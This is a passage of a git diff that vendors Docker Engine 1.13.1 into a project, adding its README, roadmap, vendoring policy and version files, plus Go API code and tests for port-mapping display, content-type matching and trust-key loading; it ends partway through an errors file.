+as they can be built by running a Unix command in a container.
+
+
+Getting started
+===============
+
+Docker can be installed either on your computer for building applications or
+on servers for running them. To get started, [check out the installation
+instructions in the
+documentation](https://docs.docker.com/engine/installation/).
+
+Usage examples
+==============
+
+Docker can be used to run short-lived commands, long-running daemons
+(app servers, databases, etc.), interactive shell sessions, etc.
+
+You can find a [list of real-world
+examples](https://docs.docker.com/engine/examples/) in the
+documentation.
+
+Under the hood
+--------------
+
+Under the hood, Docker is built on the following components:
+
+* The
+  [cgroups](https://www.kernel.org/doc/Documentation/cgroup-v1/cgroups.txt)
+  and
+  [namespaces](http://man7.org/linux/man-pages/man7/namespaces.7.html)
+  capabilities of the Linux kernel
+* The [Go](https://golang.org) programming language
+* The [Docker Image Specification](https://github.com/docker/docker/blob/master/image/spec/v1.md)
+* The [Libcontainer Specification](https://github.com/opencontainers/runc/blob/master/libcontainer/SPEC.md)
+
+Contributing to Docker [![GoDoc](https://godoc.org/github.com/docker/docker?status.svg)](https://godoc.org/github.com/docker/docker)
+======================
+
+| **Master** (Linux) | **Experimental** (Linux) | **Windows** | **FreeBSD** |
+|------------------|----------------------|---------|---------|
+| [![Jenkins Build Status](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master/badge/icon)](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master/) | [![Jenkins Build Status](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master%20%28experimental%29/badge/icon)](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master%20%28experimental%29/) | [![Build Status](http://jenkins.dockerproject.org/job/Docker%20Master%20(windows)/badge/icon)](http://jenkins.dockerproject.org/job/Docker%20Master%20(windows)/) | [![Build Status](http://jenkins.dockerproject.org/job/Docker%20Master%20(freebsd)/badge/icon)](http://jenkins.dockerproject.org/job/Docker%20Master%20(freebsd)/) |
+
+Want to hack on Docker? Awesome! We have [instructions to help you get
+started contributing code or documentation](https://docs.docker.com/opensource/project/who-written-for/).
+
+These instructions are probably not perfect, please let us know if anything
+feels wrong or incomplete. Better yet, submit a PR and improve them yourself.
+
+Getting the development builds
+==============================
+
+Want to run Docker from a master build? You can download
+master builds at [master.dockerproject.org](https://master.dockerproject.org).
+They are updated with each commit merged into the master branch.
+
+Don't know how to use that super cool new feature in the master build? Check
+out the master docs at
+[docs.master.dockerproject.org](http://docs.master.dockerproject.org).
+
+How the project is run
+======================
+
+Docker is a very, very active project. If you want to learn more about how it is run,
+or want to get more involved, the best place to start is [the project directory](https://github.com/docker/docker/tree/master/project).
+
+We are always open to suggestions on process improvements, and are always looking for more maintainers.
+
+### Talking to other Docker users and contributors
+
+<table class="tg">
+  <col width="45%">
+  <col width="65%">
+  <tr>
+    <td>Internet&nbsp;Relay&nbsp;Chat&nbsp;(IRC)</td>
+    <td>
+      <p>
+        IRC is a direct line to our most knowledgeable Docker users; we have
+        both the  <code>#docker</code> and <code>#docker-dev</code> group on
+        <strong>irc.freenode.net</strong>.
+        IRC is a rich chat protocol but it can overwhelm new users. You can search
+        <a href="https://botbot.me/freenode/docker/#" target="_blank">our chat archives</a>.
+      </p>
+      Read our <a href="https://docs.docker.com/opensource/get-help/#/irc-quickstart" target="_blank">IRC quickstart guide</a> for an easy way to get started.
+    </td>
+  </tr>
+  <tr>
+    <td>Docker Community Forums</td>
+    <td>
+      The <a href="https://forums.docker.com/c/open-source-projects/de" target="_blank">Docker Engine</a>
+      group is for users of the Docker Engine project.
+    </td>
+  </tr>
+  <tr>
+    <td>Google Groups</td>
+    <td>
+      The <a href="https://groups.google.com/forum/#!forum/docker-dev"
+      target="_blank">docker-dev</a> group is for contributors and other people
+      contributing to the Docker project.  You can join this group without a
+      Google account by sending an email to <a
+      href="mailto:docker-dev+subscribe@googlegroups.com">docker-dev+subscribe@googlegroups.com</a>.
+      You'll receive a join-request message; simply reply to the message to
+      confirm your subscription.
+    </td>
+  </tr>
+  <tr>
+    <td>Twitter</td>
+    <td>
+      You can follow <a href="https://twitter.com/docker/" target="_blank">Docker's Twitter feed</a>
+      to get updates on our products. You can also tweet us questions or just
+      share blogs or stories.
+    </td>
+  </tr>
+  <tr>
+    <td>Stack Overflow</td>
+    <td>
+      Stack Overflow has over 7000 Docker questions listed. We regularly
+      monitor <a href="https://stackoverflow.com/search?tab=newest&q=docker" target="_blank">Docker questions</a>
+      and so do many other knowledgeable Docker users.
+    </td>
+  </tr>
+</table>
+
+### Legal
+
+*Brought to you courtesy of our legal counsel. For more context,
+please see the [NOTICE](https://github.com/docker/docker/blob/master/NOTICE) document in this repo.*
+
+Use and transfer of Docker may be subject to certain restrictions by the
+United States and other governments.
+
+It is your responsibility to ensure that your use and/or transfer does not
+violate applicable laws.
+
+For more information, please see https://www.bis.doc.gov
+
+
+Licensing
+=========
+Docker is licensed under the Apache License, Version 2.0. See
+[LICENSE](https://github.com/docker/docker/blob/master/LICENSE) for the full
+license text.
+
+Other Docker Related Projects
+=============================
+There are a number of projects under development that are based on Docker's
+core technology. These projects expand the tooling built around the
+Docker platform to broaden its application and utility.
+
+* [Docker Registry](https://github.com/docker/distribution): Registry
+server for Docker (hosting/delivery of repositories and images)
+* [Docker Machine](https://github.com/docker/machine): Machine management
+for a container-centric world
+* [Docker Swarm](https://github.com/docker/swarm): A Docker-native clustering
+system
+* [Docker Compose](https://github.com/docker/compose) (formerly Fig):
+Define and run multi-container apps
+* [Kitematic](https://github.com/docker/kitematic): The easiest way to use
+Docker on Mac and Windows
+
+If you know of another project underway that should be listed here, please help
+us keep this list up-to-date by submitting a PR.
+
+Awesome-Docker
+==============
+You can find more projects, tools and articles related to Docker on the [awesome-docker list](https://github.com/veggiemonk/awesome-docker). Add your project there.
diff --git a/vendor/github.com/docker/docker/ROADMAP.md b/vendor/github.com/docker/docker/ROADMAP.md
new file mode 100644
index 0000000000..21fe06dba6
--- /dev/null
+++ b/vendor/github.com/docker/docker/ROADMAP.md
@@ -0,0 +1,118 @@
+Docker Engine Roadmap
+=====================
+
+### How should I use this document?
+
+This document provides description of items that the project decided to prioritize. This should
+serve as a reference point for Docker contributors to understand where the project is going, and
+help determine if a contribution could be conflicting with some longer terms plans.
+
+The fact that a feature isn't listed here doesn't mean that a patch for it will automatically be
+refused (except for those mentioned as "frozen features" below)! We are always happy to receive
+patches for new cool features we haven't thought about, or didn't judge priority. Please however
+understand that such patches might take longer for us to review.
+
+### How can I help?
+
+Short term objectives are listed in the [wiki](https://github.com/docker/docker/wiki) and described
+in [Issues](https://github.com/docker/docker/issues?q=is%3Aopen+is%3Aissue+label%3Aroadmap). Our
+goal is to split down the workload in such way that anybody can jump in and help. Please comment on
+issues if you want to take it to avoid duplicating effort! Similarly, if a maintainer is already
+assigned on an issue you'd like to participate in, pinging him on IRC or GitHub to offer your help is
+the best way to go.
+
+### How can I add something to the roadmap?
+
+The roadmap process is new to the Docker Engine: we are only beginning to structure and document the
+project objectives. Our immediate goal is to be more transparent, and work with our community to
+focus our efforts on fewer prioritized topics.
+
+We hope to offer in the near future a process allowing anyone to propose a topic to the roadmap, but
+we are not quite there yet. For the time being, the BDFL remains the keeper of the roadmap, and we
+won't be accepting pull requests adding or removing items from this file.
+
+# 1. Features and refactoring
+
+## 1.1 Runtime improvements
+
+We recently introduced [`runC`](https://runc.io) as a standalone low-level tool for container
+execution. The initial goal was to integrate runC as a replacement in the Engine for the traditional
+default libcontainer `execdriver`, but the Engine internals were not ready for this.
+
+As runC continued evolving, and the OCI specification along with it, we created
+[`containerd`](https://containerd.tools/), a daemon to control and monitor multiple `runC`. This is
+the new target for Engine integration, as it can entirely replace the whole `execdriver`
+architecture, and container monitoring along with it.
+
+Docker Engine will rely on a long-running `containerd` companion daemon for all container execution
+related operations. This could open the door in the future for Engine restarts without interrupting
+running containers.
+
+## 1.2 Plugins improvements
+
+Docker Engine 1.7.0 introduced plugin support, initially for the use cases of volumes and networks
+extensions. The plugin infrastructure was kept minimal as we were collecting use cases and real
+world feedback before optimizing for any particular workflow.
+
+In the future, we'd like plugins to become first class citizens, and encourage an ecosystem of
+plugins. This implies in particular making it trivially easy to distribute plugins as containers
+through any Registry instance, as well as solving the commonly heard pain points of plugins needing
+to be treated as somewhat special (being active at all time, started before any other user
+containers, and not as easily dismissed).
+
+## 1.3 Internal decoupling
+
+A lot of work has been done in trying to decouple the Docker Engine's internals. In particular, the
+API implementation has been refactored, and the Builder side of the daemon is now
+[fully independent](https://github.com/docker/docker/tree/master/builder) while still residing in
+the same repository.
+
+We are exploring ways to go further with that decoupling, capitalizing on the work introduced by the
+runtime renovation and plugins improvement efforts. Indeed, the combination of `containerd` support
+with the concept of "special" containers opens the door for bootstrapping more Engine internals
+using the same facilities.
+
+## 1.4 Cluster capable Engine
+
+The community has been pushing for a more cluster capable Docker Engine, and a huge effort was spent
+adding features such as multihost networking, and node discovery down at the Engine level. Yet, the
+Engine is currently incapable of taking scheduling decisions alone, and continues relying on Swarm
+for that.
+
+We plan to complete this effort and make Engine fully cluster capable. Multiple instances of the
+Docker Engine being already capable of discovering each other and establish overlay networking for
+their container to communicate, the next step is for a given Engine to gain ability to dispatch work
+to another node in the cluster. This will be introduced in a backward compatible way, such that a
+`docker run` invocation on a particular node remains fully deterministic.
+
+# 2 Frozen features
+
+## 2.1 Docker exec
+
+We won't accept patches expanding the surface of `docker exec`, which we intend to keep as a
+*debugging* feature, as well as being strongly dependent on the Runtime ingredient effort.
+
+## 2.2 Remote Registry Operations
+
+A large amount of work is ongoing in the area of image distribution and provenance. This includes
+moving to the V2 Registry API and heavily refactoring the code that powers these features. The
+desired result is more secure, reliable and easier to use image distribution.
+
+Part of the problem with this part of the code base is the lack of a stable and flexible interface.
+If new features are added that access the registry without solidifying these interfaces, achieving
+feature parity will continue to be elusive. While we get a handle on this situation, we are imposing
+a moratorium on new code that accesses the Registry API in commands that don't already make remote
+calls.
+
+Currently, only the following commands cause interaction with a remote registry:
+
+  - push
+  - pull
+  - run
+  - build
+  - search
+  - login
+
+In the interest of stabilizing the registry access model during this ongoing work, we are not
+accepting additions to other commands that will cause remote interaction with the Registry API. This
+moratorium will lift when the goals of the distribution project have been met.
diff --git a/vendor/github.com/docker/docker/VENDORING.md b/vendor/github.com/docker/docker/VENDORING.md
new file mode 100644
index 0000000000..3086f9d172
--- /dev/null
+++ b/vendor/github.com/docker/docker/VENDORING.md
@@ -0,0 +1,45 @@
+# Vendoring policies
+
+This document outlines recommended Vendoring policies for Docker repositories.
+(Example, libnetwork is a Docker repo and logrus is not.)
+
+## Vendoring using tags
+
+Commit ID based vendoring provides little/no information about the updates
+vendored. To fix this, vendors will now require that repositories use annotated
+tags along with commit ids to snapshot commits. Annotated tags by themselves
+are not sufficient, since the same tag can be force updated to reference
+different commits.
+
+Each tag should:
+- Follow Semantic Versioning rules (refer to section on "Semantic Versioning")
+- Have a corresponding entry in the change tracking document.
+
+Each repo should:
+- Have a change tracking document between tags/releases. Ex: CHANGELOG.md,
+github releases file.
+
+The goal here is for consuming repos to be able to use the tag version and
+changelog updates to determine whether the vendoring will cause any breaking or
+backward incompatible changes. This also means that repos can specify having
+dependency on a package of a specific version or greater up to the next major
+release, without encountering breaking changes.
+
+## Semantic Versioning
+Annotated version tags should follow Schema Versioning policies.
+According to http://semver.org:
+
+"Given a version number MAJOR.MINOR.PATCH, increment the:
+    MAJOR version when you make incompatible API changes,
+    MINOR version when you add functionality in a backwards-compatible manner, and
+    PATCH version when you make backwards-compatible bug fixes.
+Additional labels for pre-release and build metadata are available as extensions
+to the MAJOR.MINOR.PATCH format."
+
+## Vendoring cadence
+In order to avoid huge vendoring changes, it is recommended to have a regular
+cadence for vendoring updates. e.g. monthly.
+
+## Pre-merge vendoring tests
+All related repos will be vendored into docker/docker.
+CI on docker/docker should catch any breaking changes involving multiple repos.
diff --git a/vendor/github.com/docker/docker/VERSION b/vendor/github.com/docker/docker/VERSION
new file mode 100644
index 0000000000..b50dd27dd9
--- /dev/null
+++ b/vendor/github.com/docker/docker/VERSION
@@ -0,0 +1 @@
+1.13.1
diff --git a/vendor/github.com/docker/docker/api/README.md b/vendor/github.com/docker/docker/api/README.md
new file mode 100644
index 0000000000..464e056958
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/README.md
@@ -0,0 +1,42 @@
+# Working on the Engine API
+
+The Engine API is an HTTP API used by the command-line client to communicate with the daemon. It can also be used by third-party software to control the daemon.
+
+It consists of various components in this repository:
+
+- `api/swagger.yaml` A Swagger definition of the API.
+- `api/types/` Types shared by both the client and server, representing various objects, options, responses, etc. Most are written manually, but some are automatically generated from the Swagger definition. See [#27919](https://github.com/docker/docker/issues/27919) for progress on this.
+- `cli/` The command-line client.
+- `client/` The Go client used by the command-line client. It can also be used by third-party Go programs.
+- `daemon/` The daemon, which serves the API.
+
+## Swagger definition
+
+The API is defined by the [Swagger](http://swagger.io/specification/) definition in `api/swagger.yaml`. This definition can be used to:
+
+1. To automatically generate documentation.
+2. To automatically generate the Go server and client. (A work-in-progress.)
+3. Provide a machine readable version of the API for introspecting what it can do, automatically generating clients for other languages, etc.
+
+## Updating the API documentation
+
+The API documentation is generated entirely from `api/swagger.yaml`. If you make updates to the API, you'll need to edit this file to represent the change in the documentation.
+
+The file is split into two main sections:
+
+- `definitions`, which defines re-usable objects used in requests and responses
+- `paths`, which defines the API endpoints (and some inline objects which don't need to be reusable)
+
+To make an edit, first look for the endpoint you want to edit under `paths`, then make the required edits. Endpoints may reference reusable objects with `$ref`, which can be found in the `definitions` section.
+
+There is hopefully enough example material in the file for you to copy a similar pattern from elsewhere in the file (e.g. adding new fields or endpoints), but for the full reference, see the [Swagger specification](https://github.com/docker/docker/issues/27919)
+
+`swagger.yaml` is validated by `hack/validate/swagger` to ensure it is a valid Swagger definition. This is useful for when you are making edits to ensure you are doing the right thing.
+
+## Viewing the API documentation
+
+When you make edits to `swagger.yaml`, you may want to check the generated API documentation to ensure it renders correctly.
+
+All the documentation generation is done in the documentation repository, [docker/docker.github.io](https://github.com/docker/docker.github.io). The Swagger definition is vendored periodically into this repository, but you can manually copy over the Swagger definition to test changes.
+
+Copy `api/swagger.yaml` in this repository to `engine/api/[VERSION_NUMBER]/swagger.yaml` in the documentation repository, overwriting what is already there. Then, run `docker-compose up` in the documentation repository and browse to [http://localhost:4000/engine/api/](http://localhost:4000/engine/api/) when it finishes rendering.
diff --git a/vendor/github.com/docker/docker/api/common.go b/vendor/github.com/docker/docker/api/common.go
new file mode 100644
index 0000000000..fd065d5abe
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/common.go
@@ -0,0 +1,166 @@
+package api
+
+import (
+	"encoding/json"
+	"encoding/pem"
+	"fmt"
+	"mime"
+	"os"
+	"path/filepath"
+	"sort"
+	"strconv"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/libtrust"
+)
+
+// Common constants for daemon and client.
+const (
+	// DefaultVersion of Current REST API
+	DefaultVersion string = "1.26"
+
+	// NoBaseImageSpecifier is the symbol used by the FROM
+	// command to specify that no base image is to be used.
+	NoBaseImageSpecifier string = "scratch"
+)
+
+// byPortInfo is a temporary type used to sort types.Port by its fields
+type byPortInfo []types.Port
+
+func (r byPortInfo) Len() int      { return len(r) }
+func (r byPortInfo) Swap(i, j int) { r[i], r[j] = r[j], r[i] }
+func (r byPortInfo) Less(i, j int) bool {
+	if r[i].PrivatePort != r[j].PrivatePort {
+		return r[i].PrivatePort < r[j].PrivatePort
+	}
+
+	if r[i].IP != r[j].IP {
+		return r[i].IP < r[j].IP
+	}
+
+	if r[i].PublicPort != r[j].PublicPort {
+		return r[i].PublicPort < r[j].PublicPort
+	}
+
+	return r[i].Type < r[j].Type
+}
+
+// DisplayablePorts returns formatted string representing open ports of container
+// e.g. "0.0.0.0:80->9090/tcp, 9988/tcp"
+// it's used by command 'docker ps'
+func DisplayablePorts(ports []types.Port) string {
+	type portGroup struct {
+		first uint16
+		last  uint16
+	}
+	groupMap := make(map[string]*portGroup)
+	var result []string
+	var hostMappings []string
+	var groupMapKeys []string
+	sort.Sort(byPortInfo(ports))
+	for _, port := range ports {
+		current := port.PrivatePort
+		portKey := port.Type
+		if port.IP != "" {
+			if port.PublicPort != current {
+				hostMappings = append(hostMappings, fmt.Sprintf("%s:%d->%d/%s", port.IP, port.PublicPort, port.PrivatePort, port.Type))
+				continue
+			}
+			portKey = fmt.Sprintf("%s/%s", port.IP, port.Type)
+		}
+		group := groupMap[portKey]
+
+		if group == nil {
+			groupMap[portKey] = &portGroup{first: current, last: current}
+			// record order that groupMap keys are created
+			groupMapKeys = append(groupMapKeys, portKey)
+			continue
+		}
+		if current == (group.last + 1) {
+			group.last = current
+			continue
+		}
+
+		result = append(result, formGroup(portKey, group.first, group.last))
+		groupMap[portKey] = &portGroup{first: current, last: current}
+	}
+	for _, portKey := range groupMapKeys {
+		g := groupMap[portKey]
+		result = append(result, formGroup(portKey, g.first, g.last))
+	}
+	result = append(result, hostMappings...)
+	return strings.Join(result, ", ")
+}
+
+func formGroup(key string, start, last uint16) string {
+	parts := strings.Split(key, "/")
+	groupType := parts[0]
+	var ip string
+	if len(parts) > 1 {
+		ip = parts[0]
+		groupType = parts[1]
+	}
+	group := strconv.Itoa(int(start))
+	if start != last {
+		group = fmt.Sprintf("%s-%d", group, last)
+	}
+	if ip != "" {
+		group = fmt.Sprintf("%s:%s->%s", ip, group, group)
+	}
+	return fmt.Sprintf("%s/%s", group, groupType)
+}
+
+// MatchesContentType validates the content type against the expected one
+func MatchesContentType(contentType, expectedType string) bool {
+	mimetype, _, err := mime.ParseMediaType(contentType)
+	if err != nil {
+		logrus.Errorf("Error parsing media type: %s error: %v", contentType, err)
+	}
+	return err == nil && mimetype == expectedType
+}
+
+// LoadOrCreateTrustKey attempts to load the libtrust key at the given path,
+// otherwise generates a new one
+func LoadOrCreateTrustKey(trustKeyPath string) (libtrust.PrivateKey, error) {
+	err := system.MkdirAll(filepath.Dir(trustKeyPath), 0700)
+	if err != nil {
+		return nil, err
+	}
+	trustKey, err := libtrust.LoadKeyFile(trustKeyPath)
+	if err == libtrust.ErrKeyFileDoesNotExist {
+		trustKey, err = libtrust.GenerateECP256PrivateKey()
+		if err != nil {
+			return nil, fmt.Errorf("Error generating key: %s", err)
+		}
+		encodedKey, err := serializePrivateKey(trustKey, filepath.Ext(trustKeyPath))
+		if err != nil {
+			return nil, fmt.Errorf("Error serializing key: %s", err)
+		}
+		if err := ioutils.AtomicWriteFile(trustKeyPath, encodedKey, os.FileMode(0600)); err != nil {
+			return nil, fmt.Errorf("Error saving key file: %s", err)
+		}
+	} else if err != nil {
+		return nil, fmt.Errorf("Error loading key file %s: %s", trustKeyPath, err)
+	}
+	return trustKey, nil
+}
+
+func serializePrivateKey(key libtrust.PrivateKey, ext string) (encoded []byte, err error) {
+	if ext == ".json" || ext == ".jwk" {
+		encoded, err = json.Marshal(key)
+		if err != nil {
+			return nil, fmt.Errorf("unable to encode private key JWK: %s", err)
+		}
+	} else {
+		pemBlock, err := key.PEMBlock()
+		if err != nil {
+			return nil, fmt.Errorf("unable to encode private key PEM: %s", err)
+		}
+		encoded = pem.EncodeToMemory(pemBlock)
+	}
+	return
+}
diff --git a/vendor/github.com/docker/docker/api/common_test.go b/vendor/github.com/docker/docker/api/common_test.go
new file mode 100644
index 0000000000..31d6f58253
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/common_test.go
@@ -0,0 +1,341 @@
+package api
+
+import (
+	"io/ioutil"
+	"path/filepath"
+	"testing"
+
+	"os"
+
+	"github.com/docker/docker/api/types"
+)
+
+type ports struct {
+	ports    []types.Port
+	expected string
+}
+
+// DisplayablePorts
+func TestDisplayablePorts(t *testing.T) {
+	cases := []ports{
+		{
+			[]types.Port{
+				{
+					PrivatePort: 9988,
+					Type:        "tcp",
+				},
+			},
+			"9988/tcp"},
+		{
+			[]types.Port{
+				{
+					PrivatePort: 9988,
+					Type:        "udp",
+				},
+			},
+			"9988/udp",
+		},
+		{
+			[]types.Port{
+				{
+					IP:          "0.0.0.0",
+					PrivatePort: 9988,
+					Type:        "tcp",
+				},
+			},
+			"0.0.0.0:0->9988/tcp",
+		},
+		{
+			[]types.Port{
+				{
+					PrivatePort: 9988,
+					PublicPort:  8899,
+					Type:        "tcp",
+				},
+			},
+			"9988/tcp",
+		},
+		{
+			[]types.Port{
+				{
+					IP:          "4.3.2.1",
+					PrivatePort: 9988,
+					PublicPort:  8899,
+					Type:        "tcp",
+				},
+			},
+			"4.3.2.1:8899->9988/tcp",
+		},
+		{
+			[]types.Port{
+				{
+					IP:          "4.3.2.1",
+					PrivatePort: 9988,
+					PublicPort:  9988,
+					Type:        "tcp",
+				},
+			},
+			"4.3.2.1:9988->9988/tcp",
+		},
+		{
+			[]types.Port{
+				{
+					PrivatePort: 9988,
+					Type:        "udp",
+				}, {
+					PrivatePort: 9988,
+					Type:        "udp",
+				},
+			},
+			"9988/udp, 9988/udp",
+		},
+		{
+			[]types.Port{
+				{
+					IP:          "1.2.3.4",
+					PublicPort:  9998,
+					PrivatePort: 9998,
+					Type:        "udp",
+				}, {
+					IP:          "1.2.3.4",
+					PublicPort:  9999,
+					PrivatePort: 9999,
+					Type:        "udp",
+				},
+			},
+			"1.2.3.4:9998-9999->9998-9999/udp",
+		},
+		{
+			[]types.Port{
+				{
+					IP:          "1.2.3.4",
+					PublicPort:  8887,
+					PrivatePort: 9998,
+					Type:        "udp",
+				}, {
+					IP:          "1.2.3.4",
+					PublicPort:  8888,
+					PrivatePort: 9999,
+					Type:        "udp",
+				},
+			},
+			"1.2.3.4:8887->9998/udp, 1.2.3.4:8888->9999/udp",
+		},
+		{
+			[]types.Port{
+				{
+					PrivatePort: 9998,
+					Type:        "udp",
+				}, {
+					PrivatePort: 9999,
+					Type:        "udp",
+				},
+			},
+			"9998-9999/udp",
+		},
+		{
+			[]types.Port{
+				{
+					IP:          "1.2.3.4",
+					PrivatePort: 6677,
+					PublicPort:  7766,
+					Type:        "tcp",
+				}, {
+					PrivatePort: 9988,
+					PublicPort:  8899,
+					Type:        "udp",
+				},
+			},
+			"9988/udp, 1.2.3.4:7766->6677/tcp",
+		},
+		{
+			[]types.Port{
+				{
+					IP:          "1.2.3.4",
+					PrivatePort: 9988,
+					PublicPort:  8899,
+					Type:        "udp",
+				}, {
+					IP:          "1.2.3.4",
+					PrivatePort: 9988,
+					PublicPort:  8899,
+					Type:        "tcp",
+				}, {
+					IP:          "4.3.2.1",
+					PrivatePort: 2233,
+					PublicPort:  3322,
+					Type:        "tcp",
+				},
+			},
+			"4.3.2.1:3322->2233/tcp, 1.2.3.4:8899->9988/tcp, 1.2.3.4:8899->9988/udp",
+		},
+		{
+			[]types.Port{
+				{
+					PrivatePort: 9988,
+					PublicPort:  8899,
+					Type:        "udp",
+				}, {
+					IP:          "1.2.3.4",
+					PrivatePort: 6677,
+					PublicPort:  7766,
+					Type:        "tcp",
+				}, {
+					IP:          "4.3.2.1",
+					PrivatePort: 2233,
+					PublicPort:  3322,
+					Type:        "tcp",
+				},
+			},
+			"9988/udp, 4.3.2.1:3322->2233/tcp, 1.2.3.4:7766->6677/tcp",
+		},
+		{
+			[]types.Port{
+				{
+					PrivatePort: 80,
+					Type:        "tcp",
+				}, {
+					PrivatePort: 1024,
+					Type:        "tcp",
+				}, {
+					PrivatePort: 80,
+					Type:        "udp",
+				}, {
+					PrivatePort: 1024,
+					Type:        "udp",
+				}, {
+					IP:          "1.1.1.1",
+					PublicPort:  80,
+					PrivatePort: 1024,
+					Type:        "tcp",
+				}, {
+					IP:          "1.1.1.1",
+					PublicPort:  80,
+					PrivatePort: 1024,
+					Type:        "udp",
+				}, {
+					IP:          "1.1.1.1",
+					PublicPort:  1024,
+					PrivatePort: 80,
+					Type:        "tcp",
+				}, {
+					IP:          "1.1.1.1",
+					PublicPort:  1024,
+					PrivatePort: 80,
+					Type:        "udp",
+				}, {
+					IP:          "2.1.1.1",
+					PublicPort:  80,
+					PrivatePort: 1024,
+					Type:        "tcp",
+				}, {
+					IP:          "2.1.1.1",
+					PublicPort:  80,
+					PrivatePort: 1024,
+					Type:        "udp",
+				}, {
+					IP:          "2.1.1.1",
+					PublicPort:  1024,
+					PrivatePort: 80,
+					Type:        "tcp",
+				}, {
+					IP:          "2.1.1.1",
+					PublicPort:  1024,
+					PrivatePort: 80,
+					Type:        "udp",
+				},
+			},
+			"80/tcp, 80/udp, 1024/tcp, 1024/udp, 1.1.1.1:1024->80/tcp, 1.1.1.1:1024->80/udp, 2.1.1.1:1024->80/tcp, 2.1.1.1:1024->80/udp, 1.1.1.1:80->1024/tcp, 1.1.1.1:80->1024/udp, 2.1.1.1:80->1024/tcp, 2.1.1.1:80->1024/udp",
+		},
+	}
+
+	for _, port := range cases {
+		actual := DisplayablePorts(port.ports)
+		if port.expected != actual {
+			t.Fatalf("Expected %s, got %s.", port.expected, actual)
+		}
+	}
+}
+
+// MatchesContentType
+func TestJsonContentType(t *testing.T) {
+	if !MatchesContentType("application/json", "application/json") {
+		t.Fail()
+	}
+
+	if !MatchesContentType("application/json; charset=utf-8", "application/json") {
+		t.Fail()
+	}
+
+	if MatchesContentType("dockerapplication/json", "application/json") {
+		t.Fail()
+	}
+}
+
+// LoadOrCreateTrustKey
+func TestLoadOrCreateTrustKeyInvalidKeyFile(t *testing.T) {
+	tmpKeyFolderPath, err := ioutil.TempDir("", "api-trustkey-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpKeyFolderPath)
+
+	tmpKeyFile, err := ioutil.TempFile(tmpKeyFolderPath, "keyfile")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := LoadOrCreateTrustKey(tmpKeyFile.Name()); err == nil {
+		t.Fatalf("expected an error, got nothing.")
+	}
+
+}
+
+func TestLoadOrCreateTrustKeyCreateKey(t *testing.T) {
+	tmpKeyFolderPath, err := ioutil.TempDir("", "api-trustkey-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpKeyFolderPath)
+
+	// Without the need to create the folder hierarchy
+	tmpKeyFile := filepath.Join(tmpKeyFolderPath, "keyfile")
+
+	if key, err := LoadOrCreateTrustKey(tmpKeyFile); err != nil || key == nil {
+		t.Fatalf("expected a new key file, got : %v and %v", err, key)
+	}
+
+	if _, err := os.Stat(tmpKeyFile); err != nil {
+		t.Fatalf("Expected to find a file %s, got %v", tmpKeyFile, err)
+	}
+
+	// With the need to create the folder hierarchy as tmpKeyFie is in a path
+	// where some folders do not exist.
+	tmpKeyFile = filepath.Join(tmpKeyFolderPath, "folder/hierarchy/keyfile")
+
+	if key, err := LoadOrCreateTrustKey(tmpKeyFile); err != nil || key == nil {
+		t.Fatalf("expected a new key file, got : %v and %v", err, key)
+	}
+
+	if _, err := os.Stat(tmpKeyFile); err != nil {
+		t.Fatalf("Expected to find a file %s, got %v", tmpKeyFile, err)
+	}
+
+	// With no path at all
+	defer os.Remove("keyfile")
+	if key, err := LoadOrCreateTrustKey("keyfile"); err != nil || key == nil {
+		t.Fatalf("expected a new key file, got : %v and %v", err, key)
+	}
+
+	if _, err := os.Stat("keyfile"); err != nil {
+		t.Fatalf("Expected to find a file keyfile, got %v", err)
+	}
+}
+
+func TestLoadOrCreateTrustKeyLoadValidKey(t *testing.T) {
+	tmpKeyFile := filepath.Join("fixtures", "keyfile")
+
+	if key, err := LoadOrCreateTrustKey(tmpKeyFile); err != nil || key == nil {
+		t.Fatalf("expected a key file, got : %v and %v", err, key)
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/common_unix.go b/vendor/github.com/docker/docker/api/common_unix.go
new file mode 100644
index 0000000000..081e61c451
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/common_unix.go
@@ -0,0 +1,6 @@
+// +build !windows
+
+package api
+
+// MinVersion represents Minimum REST API version supported
+const MinVersion string = "1.12"
diff --git a/vendor/github.com/docker/docker/api/common_windows.go b/vendor/github.com/docker/docker/api/common_windows.go
new file mode 100644
index 0000000000..d930fa0720
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/common_windows.go
@@ -0,0 +1,8 @@
+package api
+
+// MinVersion represents Minimum REST API version supported
+// Technically the first daemon API version released on Windows is v1.25 in
+// engine version 1.13. However, some clients are explicitly using downlevel
+// APIs (eg docker-compose v2.1 file format) and that is just too restrictive.
+// Hence also allowing 1.24 on Windows.
+const MinVersion string = "1.24"
diff --git a/vendor/github.com/docker/docker/api/errors/errors.go b/vendor/github.com/docker/docker/api/errors/errors.go
new file mode 100644
index 0000000000..29fd2545dc
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/errors/errors.go
@@ -0,0 +1,47 @@
+package errors
+
+import "net/http"
+
+// apiError is an error wrapper that also
+// holds information about response status codes.
+type apiError struct {
+	error
+	statusCode int
+}
+
+// HTTPErrorStatusCode returns a status code.
+func (e apiError) HTTPErrorStatusCode() int {
+	return e.statusCode
+}
+
+// NewErrorWithStatusCode allows you to associate
+// a specific HTTP Status Code to an error.
+// The Server will take that code and set
+// it as the response status.
+func NewErrorWithStatusCode(err error, code int) error {
+	return apiError{err, code}
+}
+
+// NewBadRequestError creates a new API error
+// that has the 400 HTTP status code associated to it.
+func NewBadRequestError(err error) error {
+	return NewErrorWithStatusCode(err, http.StatusBadRequest)
+}
+
+// NewRequestForbiddenError creates a new API error
+// that has the 403 HTTP status code associated to it.
+func NewRequestForbiddenError(err error) error {
+	return NewErrorWithStatusCode(err, http.StatusForbidden)
+}
+
+// NewRequestNotFoundError creates a new API error
+// that has the 404 HTTP status code associated to it.
+func NewRequestNotFoundError(err error) error {
